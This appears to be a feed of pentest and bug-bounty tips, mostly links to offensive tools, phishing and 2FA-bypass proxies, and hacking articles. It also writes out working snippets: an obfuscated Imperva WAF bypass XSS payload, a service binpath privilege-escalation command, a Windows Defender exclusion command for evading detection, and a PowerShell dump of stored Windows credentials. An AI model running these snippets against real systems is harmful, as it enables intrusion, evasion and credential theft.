#Java Deserialization: Misusing OJDBC for SSRF


https://agrrrdog.blogspot.com/2018/01/java-deserialization-misusing-ojdbc-for.html


#pentest

TIDoS Framework

The Offensive Web Application Penetration Testing Framework.


https://github.com/theInfectedDrake/TIDoS-Framework


#web
#pentest

DbgShell - A PowerShell Front-End For The Windows Debugger Engine http://bit.ly/2O7c30o #infosec #hacking #hackers #pentesting #pentest #programming #opensource #powershell #Windows

Gerix WiFi Cracker 2018

https://github.com/kimocoder/gerix-wifi-cracker


#wifi
#network
#pentest

@sec_nerd

Imperva WAF Bypass for XSS;

<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">

- without parentheses, 'alert', 'document.domain' , 'window' , space



#waf
#web
#pentest



@sec_nerd

CVE-2019-1322
as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!


https://twitter.com/decoder_it/status/1193496591140818944?s=20

تست نشده!

#windows
#privesc
#pentest



@sec_nerd

Add a file/folder to #Windows Defender exclusion list

C:\>powershell -exec bypass - "Add-MpPreference -ExclusionPath 'D:\EvilFolder\Tools'"

useful if you want to move #pentest tools to a Windows machine without Defender interfering

Admin UAC prompt required

#powershell #oscp

Best #firefox addons for #Hacking:
-HackBar
-Cookies Manager+
-User-Agent Switcher
-Tamper Data
-FoxyProxy Standard
-Wappalyzer:
-HttpRequester
-RESTClient:
-Tampermonkey
-XSS Me
-SQL Inject Me
-iMacros
-FirePHP
#bugbountytips #bugbountytip #hacking #OSINT #pentest

different 2FA bypasses:
evilginx:https://github.com/kgretzky/evilginx2
CredSniper:https://github.com/ustayready/CredSniper
ReelPhish:https://github.com/fireeye/ReelPhish
Modlishka:https://github.com/drk1wi/Modlishka
#pentest #hacking #phishing #redteam #bugbountytip

Hacking SQL Server Stored Procedures

1: (un)Trustworthy Databases
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/

2: User Impersonation
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/

3: SQL Injection
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/

4: Enumerating Domain Accounts
https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/

#infosec #pentest #redteam

CSV Injection: http://ghostlulz.com/csv-injection/

ClickJacking: http://ghostlulz.com/clickjacking/

Exposed Firebase DB: http://ghostlulz.com/google-exposed-firebase-database/

Config Files: http://ghostlulz.com/exposed-log-and-configuration-files/

Kubernetes API : http://ghostlulz.com/exposed-kubernetes-api/

#bugbounty #bugbountytips #bugbountytip #redteam #pentest #infosec #xss

Linux For Pentester:tmux Privilege Escalation.pdf:
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/8-part-100-article/62_article/new/Linux%20For%20Pentester:%20tmux%20Privilege%20Escalation.pdf
Linux for Pentester:Perl Privilege Escalation.pdf
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/2/Linux%20for%20Pentester:%20Perl%20Privilege%20Escalation.pdf
Linux for Pentester:ed Privilege Escalation.pdf
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/8-part-100-article/62_article/new/Linux%20for%20Pentester:%20ed%20Privilege%20Escalation.pdf
#Pentesting #RedTeam #hacking #PenTest

No Privilege Escalating through standard methods ?

whoami /priv

If you got one of these == win 😏


SeBackupPrivilege, SeDebugPrivilege, SeTakeOwnershipPrivilege, SeTcbPrivilege, SeCreateToken Privilege, SeLoadDriver Privilege, SeImpersonate

#infosec #pentest #redteam

5 Subdomain Takeover #ProTips.pdf:
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/7-part-100-article/new_articles/5%20Subdomain%20Takeover%20%23ProTips.pdf
Finding the Balance Between Speed & Accuracy During an Internet-wide Port Scanning.pdf:
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/2-part-100-article/Finding%20the%20Balance%20Between%20Speed%20&%20Accuracy%20During%20an%20Internet-wide%20Port%20Scanning.pdf
Phishing With a Rogue Wi-Fi Access Point.pdf
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/7-part-100-article/new_articles/Phishing%20With%20a%20Rogue%20Wi-Fi%20Access%20Point.pdf
#bugbountytip #Hacking #OSINT #Pentest

Dump local Creds

PS>
[void][http://Windows.Security.Credentials.PasswordVault,http://Windows.Security.Credentials,ContentType=WindowsRuntime]
$pw = New-Object http://Windows.Security.Credentials.PasswordVault
$pw.RetrieveAll() | % { $_.RetrievePassword();$_ }

#redteam #pentest

Grep hostnames from ssl certificate

echo | openssl s_client -connect example\.com | openssl x509 -noout -text | grep DNS

#infosec #pentest #bugbounty

#Pentest #bugbounty

https://github.com/k8gege/K8tools
https://github.com/mbechler/marshalsec
https://github.com/lanjelot/patator
https://github.com/coreb1t/awesome-pentest-cheat-sheets
https://github.com/evilcos/xssor2
https://github.com/cujanovic/SSRF-Testing
https://github.com/LandGrey/pydictor
https://github.com/m0rtem/CloudFail
https://github.com/1N3/Findsploit
https://github.com/rewardone/OSCPRepo


#bugbountytips

#pentest
https://github.com/jivoi/pentest
CrackMapExec
https://github.com/byt3bl33d3r/CrackMapExec
Red-Teaming-Toolkit
https://github.com/infosecn1nja/Red-Teaming-Toolkit
pwndb
https://github.com/davidtavarez/pwndb
pupy
https://github.com/n1nj4sec/pupy
Red-Team-Infrastructure-Wiki
https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki
Cheatsheet-God
https://github.com/OlivierLaflamme/Cheatsheet-God

#bugbountytips